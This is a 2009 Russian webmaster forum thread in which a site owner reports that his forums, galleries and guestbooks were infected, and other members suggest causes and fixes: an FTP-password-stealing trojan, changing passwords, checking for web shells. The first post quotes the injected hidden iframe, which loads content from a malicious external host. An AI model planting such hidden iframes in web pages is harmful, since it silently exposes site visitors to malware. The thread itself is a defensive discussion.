X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Вирусы
kgalkin
kgalkin
Topic Starter сообщение 19.6.2009, 0:22; Ответить: kgalkin
Сообщение #1


Участник
***

Группа: User
Сообщений: 244
Регистрация: 21.12.2008
Из: Москва
Поблагодарили: 43 раза
Репутация:   10  


Все мои сайты поразил вирус
iframe src="http://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi70" width=125 height=125 style="visibility: hidden">/iframe
ФОрум, галерея, гостевухи..

все index.php или html заражен подобной хренью...



попробовал вычистить, где мало файлов - получилось...
форум и галерея так и лежат..
либо пропустил где то..либо еще что то...
так же есть подозрение, что убивается содержимое файла...
незакрытые теги и т.д..

что это, кто сталкивался и как бороться?


--------------------
<a rel="nofollow" href="http://talk.maulnet.ru/url.php?to=http://exchengine.ru/?pid=301632666677" target="_blank">Лучший обмен валют!</a>



<a rel="nofollow" href="http://talk.maulnet.ru/url.php?to=http://icq.img.tj" target="_blank">[img]http://icq.img.tj/ub/2/3381524.jpg[/img]</a>
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
GreyGhost
GreyGhost
сообщение 19.6.2009, 1:00; Ответить: GreyGhost
Сообщение #2


Завсегдатай
*****


Группа: Active User
Сообщений: 661
Регистрация: 17.3.2009
Поблагодарили: 112 раз
Репутация:   5  


бороться, элементарно
DirectoryIndex VasyaPupkinIndex.php

на нормальных хостингах, .htaccess - не доступен по фтп(про перезапись умолчу), только по телнету
и пусть вирусы в index.* пищут smile.gif
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kgalkin
kgalkin
Topic Starter сообщение 19.6.2009, 9:14; Ответить: kgalkin
Сообщение #3


Участник
***

Группа: User
Сообщений: 244
Регистрация: 21.12.2008
Из: Москва
Поблагодарили: 43 раза
Репутация:   10  


(GreyGhost @ 19.6.2009, 1:00) *
бороться, элементарно
DirectoryIndex VasyaPupkinIndex.php

на нормальных хостингах, .htaccess - не доступен по фтп(про перезапись умолчу), только по телнету
и пусть вирусы в index.* пищут smile.gif


м-м-м..теперь по русски, тоже самое )))

Мои действия по пунктам, если не трудно!


--------------------
<a rel="nofollow" href="http://talk.maulnet.ru/url.php?to=http://exchengine.ru/?pid=301632666677" target="_blank">Лучший обмен валют!</a>



<a rel="nofollow" href="http://talk.maulnet.ru/url.php?to=http://icq.img.tj" target="_blank">[img]http://icq.img.tj/ub/2/3381524.jpg[/img]</a>
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
vMaster
vMaster
сообщение 20.6.2009, 2:37; Ответить: vMaster
Сообщение #4


Участник
***

Группа: User
Сообщений: 180
Регистрация: 17.11.2008
Из: Калининград
Поблагодарили: 23 раза
Репутация:   6  


(GreyGhost @ 19.6.2009, 0:00) *
бороться, элементарно
DirectoryIndex VasyaPupkinIndex.php

на нормальных хостингах, .htaccess - не доступен по фтп(про перезапись умолчу), только по телнету
и пусть вирусы в index.* пищут smile.gif

Поможет не во всех случаях.
Во-первых, придется переименовывать оригинальный index.php, менять все url на сайте, что не очень удобно и не всегда разумно.
Во-вторых, скрипты(программы)-ифреймеры могут перезаписывать не только индексные файлы, но и файлы по маске *.html, *.php и т.п.

Вероятнее всего вы просто подхватили фтп-граббер через браузер. Проверьте компьютер на вирусы, грамотно настройте фаерволл и смените все пароли на фтп.
Так же рекомендую прошерстить все файлы/каталоги на сайтах, если это был "ручной" взлом, вероятно злоумышленник оставил после себя веб-шелл или бэкдор.


--------------------
Подбор НЧ запросов, используя данные статистики Liveinternet или Google Analytics
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kgalkin
kgalkin
Topic Starter сообщение 20.6.2009, 15:40; Ответить: kgalkin
Сообщение #5


Участник
***

Группа: User
Сообщений: 244
Регистрация: 21.12.2008
Из: Москва
Поблагодарили: 43 раза
Репутация:   10  


(vMaster @ 20.6.2009, 2:37) *
Вероятнее всего вы просто подхватили фтп-граббер через браузер. Проверьте компьютер на вирусы, грамотно настройте фаерволл и смените все пароли на фтп.
Так же рекомендую прошерстить все файлы/каталоги на сайтах, если это был "ручной" взлом, вероятно злоумышленник оставил после себя веб-шелл или бэкдор.


Пароли изменил на фтп...
Все сайты, которые смог - проверил. Во многих индекс.php и html эта пакость сидела. Удалил.

А большие порталы - форумы, галереи..походу придется поновой перезаливать, т.к прошерстить каждую папку и файл - нереально помоему...


--------------------
<a rel="nofollow" href="http://talk.maulnet.ru/url.php?to=http://exchengine.ru/?pid=301632666677" target="_blank">Лучший обмен валют!</a>



<a rel="nofollow" href="http://talk.maulnet.ru/url.php?to=http://icq.img.tj" target="_blank">[img]http://icq.img.tj/ub/2/3381524.jpg[/img]</a>
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Protrafv2.com Льет Ифреим На Вирусы.
Protrafv2.com вирусная пп.
45 Virus_07 12855 7.10.2010, 0:41
автор: butcher
Открытая тема (нет новых ответов) Advmaker.ru распространяет вирусы?
3 Aone 2671 27.9.2009, 0:09
автор: tokito
Горячая тема (нет новых ответов) poptraf.ru распространяет вирусы
осторожно
38 white_wolf 10630 18.2.2009, 19:18
автор: vandamme


 



RSS Текстовая версия Сейчас: 11.12.2017, 23:18
Дизайн